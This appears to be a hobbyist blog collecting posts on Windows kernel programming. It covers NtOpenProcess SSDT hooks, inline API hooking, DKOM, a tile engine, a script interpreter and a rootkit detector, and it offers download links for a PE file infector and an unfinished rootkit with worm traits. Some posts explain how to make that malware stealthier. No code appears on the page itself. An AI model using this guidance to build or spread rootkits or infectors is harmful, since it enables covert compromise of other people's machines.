Well its been quite a while now since I’ve last updated my blog, yet its just passed 42,600 hits! Anyway, my time is now predominantly taken up by a new activity, with minimal time spent behind a computer, and even less time spent programming. I’ve taken up flying.
Ok well a few of my pieces of code here rely upon the ImageFileName element within the EPROCESS structure (which you can find in the ntifs_6001.h) header I’ve uploaded. Again, in 7600 it seems to be missing. Weird.
Anyway, the problem was that ImageFileName was returning nothing. Blank. So evidently the offset has changed. I wrote a peice of code to enumerate the base addresses of each EPROCESS structure and then looked at them in Win Dbg, have a look:
That image should pretty much give you an idea of what to do. Count the bytes. Find the new offset.
Previously the offset for ImageFileName was +0×154 now all of a sudden its +0×174. To implement search for this offset programmatically, search the memory from each EPROCESS base for the string “system”. As it will ALWAYS be there, makes for an easy way to determine the correct offset.
I have attached an updated version of my NtOpenProcessHook below with the fix.
The hack (this is too crude to be a fix!) lies in the RetrievePID() function. So have a look there for comparison.
[ Link ] My Old NtOpenProcessHook post
[ C - Source ] New NtOpenProcessHook Driver
[ C - Source ] Old NtOpenProcessHook Driver
[ C - Header ] ntifs_6001.h
This was an idea that I used in the Rootkit idea below.
Just a extract explained.
[ .rar ] Project files
[ C - Source ] PEInfect
Unmodified program shown in PE Explorer.
Unmodified programs entry point shown in ollydbg.
Modified program shown in PE Explorer:
Modified programs entry point shown in ollydbg:
This was the result of me messing around last November.
Shows just how easy a rootkit with simple worm characteristics could be to write, but I got bored with it and it hasnt progressed for the past two months, but I may as well post it.
What needs to be finished, as far as I can see is:
-prevent remodifying the target-files PE-Header.
-the mailbox system. Makes sure only one copy of the file is run at a time to ensure agaisnt driver crashes.
-all the strings need to be encrypted and then decrypted when used and erased.
-all allocated memory needs to be deallocated.
Rootkit:
[ .rar ]Project Files (Driver/Application)
[ C - Source ]Driver
[ C++ - Source ]Main program
ntifs.h
Someone asked me the other-day about writing a simple scripting language, so I got around to playing around a bit, and ended up writing a simple interpreter. In appearance I guess it looks something like a cross between assembly (source, destination) and BASIC:
It supports a simple form of loops, variable storage and retrieval, basic (limited functionality at this point) conditional statements, variable output.
Download:
-source code here.
-Project Files here (contains script file)
-sample script file
A ‘Crude’ method of preventing access to a program is by hooking NtOpenProcess and denying any request for a handle. Simple. The screenshot below shows what happens when I tried to terminate notepad, which at the time was ‘protected’ by this hook. A detour hook would be preferable to an SSDT pointer change as it is less detectable, but I’ll cover that some other time.
[ C - Source ] Driver.c
[ C++ - Source ] DriverControll.cpp
Download the compiled executable.
ntifs.h
NEW post regarding NtOpenProcess hooks
Operation: Once the executable has been run and you’ve entered your target process name (with the .exe!) and you are presented with an arrow (–>), you have three commands. HOOK, UNHOOK, EXIT. They’re fairly explanatory. Unhook before you exit. Make sure you’ve spelt the process name correctly.
Ok, as with many previous things this is XP only. The call number would need to be changed for other OS’s or SP’s. Look here for different call numbers.
So I decided to give DirectX a shot and try and create a Tile Engine (wikipedia link for those who dont know..)
Without much reading or forethought I went ahead and started coding. Not really happy with the results, has a quite a few things which I would do different. A pixel based camera rather than a tile based one, so I’m posting this here and leaving it as is. I’ll salvage bits from this code and recode it and see what I come up with.
Anyway, heres a picture of it:
The values in the map file are stored in little endian format, and the structure of the map file explained here in picture format.
I see a few people looking for information on winsock and WINAPI hooks in general.
Well, heres an easily modifiable inline hook.
It works quite simply by replacing the 5 byte preamble at the start of the target function (NOTE: in pre win-xp sp2 systems this will be 3 bytes, and not five, so that would need to be changed) with a jump to our function, doing whatever we need to do then jump back to the original code. However, because we’re replacing that preamble, for things to work we have to add those commands in our hook function.
Hook diagram
So its been just over five months since my last post, which is pretty pathetic but I’m at a sheer loss of idea’s for content.
If you wanna see something specific, write a comment with your thoughts and requests and I’ll see what I can do.
I recently decided to rework a piece of code I wrote earlier this year, and decided to expand upon it.
My intent is to eventually have something resembling a fully fledged rootkit-detector, but I think thats still a while off. I did however add a few new functions to my previous version: amongst them the ability to detect both detour hooks and ssdt-table pointer hooks, that and the ability to detect hidden processes – the latter being something I still need to do a bit of work on, but I’ll include that in my next version.
I also had some fun and reworked the GUI and came up with a cool way of doing so. I thought it came out looking pretty stylish (as you can see in the screenshot below 
).
You can download it here:
EXE Download (.zip)
Some screenshots:
In action…
The reworked GUI again
And the original programs post
Note: wont work on pre XP-sp2 systems. Nor do I think it will work on Vista.
Right so this particular post assumes that you’ve got some knowledge as to what DKOM (Direct Kernel Object Manipulation) is and the specifics of the _KPROCESS structure.
Well anyway, you can view the code here.
Enjoy 
So I was bored the other day and wanted to code something that would get me back into coding as I’ve had a bit of a break.
This is the result:
I wrote a quick unhook function but its erratic at best and keeps BSOD’ing me… So I’ll update this once I’ve got that working flawlessly.
If it DOES pick something up, make a note of what it is because it may be perfectly legit. For instance various AV’s hook NtOpenProcess to protect its main process. However, if it pics something like NtQueryDirectoryFile chances are you’ve got a rootkit. However, if it doenst pick anything up… thats a good thing.
In the pic I hooked several items, for demonstration purposes.
Driver: 90% inline assembly, 10% C.
GUI: 100% C++.
If you want, you can download it here.
Note: I’m 99.99% sure it wont work on Vista – so its confined to all versions of Windows XP.
